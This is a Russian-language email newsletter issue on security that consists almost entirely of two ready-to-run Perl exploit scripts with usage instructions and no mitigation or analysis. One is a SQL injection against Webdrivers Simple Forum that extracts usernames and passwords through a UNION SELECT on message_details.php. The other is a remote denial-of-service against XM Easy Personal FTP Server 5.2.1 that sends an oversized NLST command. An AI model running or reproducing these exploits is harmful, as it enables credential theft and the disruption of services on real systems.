Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.


Компьютер для продвинутых пользователей
В этом выпуске:
Webdrivers Simple Forum | XM Easy Personal FTP Server
ПО: Webdrivers Simple Forum

expl.pl:
#!perl
use IO::Socket;
#Download:http://www.thewebdrivers.com/forum.zip
#By:Bl0od3r
#Germany =]
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
   $id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET 
".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register 
WHERE id=".$id."/* HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($ans=<$socket>) {
$ans=~ m/<span class="style3"> Re :  -(.*?)-/ && print 
"--------------------------------------------\n[+]UserName: 
$1\n[+]PassWord:";
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
  } else {
print "[-]Error";
    }
  }
sub header() {
print
"--------------------------------------------------------------------\n";
print "|\t---------->By Bl0od3r<---------\t\t\t\t    |";
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t    |";
print
"\n--------------------------------------------------------------------\n";
exit;
}

ПО: XM Easy Personal FTP Server
Версия: 5.2.1

DoS.pl:
#!/usr/bin/perl
#
# *
# * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial 
of Service
# * Author: boecke
# * Discovery: boecke
# * Vulnerability Type: Remote Denial of Service
# * Risk: Low Risk (Requires valid
# * Software Affected: XM Easy Personal FTP Server <= 5.2.1
# * Greetings: henrik, str0ke!
# *
#

use IO::Socket;

$commandToSend = "NLST -al ";
$remoteUsername = "anonymous";
$remotePassword = "borat\@kik.com";
$remotePort = $ARGV[1];

sub bannerExploit()
{
       print "\n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial 
of Service\n";
       print " x Author: boecke\n x Discovery: boecke (boecke [at] 
herzeleid [dot] net)\n\n";
}

if ( @ARGV < 2 )
{
       bannerExploit();
       print " * Usage: perl ftp.pl 192.168.0.1 21\n\n";
       exit;
}

if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => 
$remotePort, Proto => "TCP" ))
{
       bannerExploit();
       print " + Establishing connection at " . $ARGV[0] . ":" . 
$remotePort . "\n";
       print $socket "USER " . $remoteUsername . "\r\n";
       print " * FTP Username: \'" . $remoteUsername . "\'\n";
       sleep( 1 );
       print $socket "PASS " . $remotePassword . "\r\n";
       print " * FTP Password: \'" . $remotePassword . "\'\n";
       print $socket $commandToSend . "A" x 9000 . "\r\n";
       sleep( 3 );
       print $socket "QUIT\r\n";
       print " + Sent 9000 bytes of data to $ARGV[0]:$remotePort\n\n";
}
else
{
       bannerExploit();
       print " + Failed to establish connection to " . $ARGV[0] . ":" . 
$remotePort . "\n";
}
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное